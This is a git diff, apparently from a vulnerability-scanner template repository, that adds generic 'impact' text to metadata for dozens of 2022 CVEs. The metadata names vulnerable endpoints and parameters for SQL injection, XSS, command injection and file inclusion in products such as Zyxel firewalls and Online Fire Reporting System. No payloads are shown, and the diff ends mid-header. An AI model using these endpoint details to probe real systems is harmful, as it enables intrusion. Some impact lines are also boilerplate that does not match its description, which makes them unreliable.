@@ -6,6 +6,8 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 930173625c..8ead5cc815 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 21bc9d57c3..47ad00e9a8 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.4.12 reference: - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index b5ea8dde24..28a54e6b45 100644 --- a/http/cves/2022/CVE-2022-30776.yaml 
+++ b/http/cves/2022/CVE-2022-30776.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 800841dfa3..84ea3dff25 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index 189bd39f24..c654658434 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Users are advised to upgrade to latest version. reference: - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 99aa2a1539..058617c1a2 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268). reference: diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index b1871dfe7f..50801357fc 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the device. remediation: | Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index b420146157..30fc67c882 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index d1e42fbf5e..aacf0272fb 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index 719d2d59c0..769c2b312f 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -5,6 +5,8 @@ info: author: aringo severity: high description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. remediation: Upgrade to at least version 8.7.5 or higher reference: - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/ diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 90f732d091..ae6d35fe22 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index aedacf04fa..1da7f79426 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations. reference: diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 891dd7e923..d8c8656961 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series. reference: diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index ebcc7805fe..683f05fa6b 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 8ec9ceae2c..6b58608748 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 08e72d3d06..0891ed43de 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index c916109adf..a026191ea0 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 93cff57e53..56d76990a0 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Codoforum. reference: diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 61eb517636..d26b630b60 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index cfd7732726..39dc3de3ba 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 53c9d07c13..48e02c6f2e 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 653f5b5a8d..fa6b7132c4 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 8c24d5e57d..cfd6042caf 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index 86c7ce3dcc..b20eda9e85 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: 
diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index c3027d5dcd..fb7e40f795 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 174daa5ef6..3954ca24e6 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 9427a0d5d3..8ce7f8422f 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index e4e1202502..bdf7adda82 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 4f1b8b2d9e..67875120c8 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index ee862428ec..72cbbb4085 100644 
--- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index ef6432d2d2..0be759b84d 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 86d4079056..d043cbd630 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 75dd5560fa..58b152d7d7 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or even complete compromise of the system. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 2a1648cb24..8582738fdd 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 7c8d83ff89..27d943e27d 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 83094f935a..1396baf1f9 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 7ebd9c0927..eb91ddc742 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 150fe4a483..3b1792871c 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index eb9add1445..8b0b27d3ed 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 0426048bcc..45bd896438 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index 2c1020d733..3fbba75b34 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest patch or update to a version that has fixed this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index db01ef2113..a04817e379 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 6e0be3c7dd..0e7c44d39c 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 34a5987cdf..79c662448c 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index cc50190b75..addc16b527 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. reference: diff --git a/http/cves/2022/CVE-2022-33174.yaml 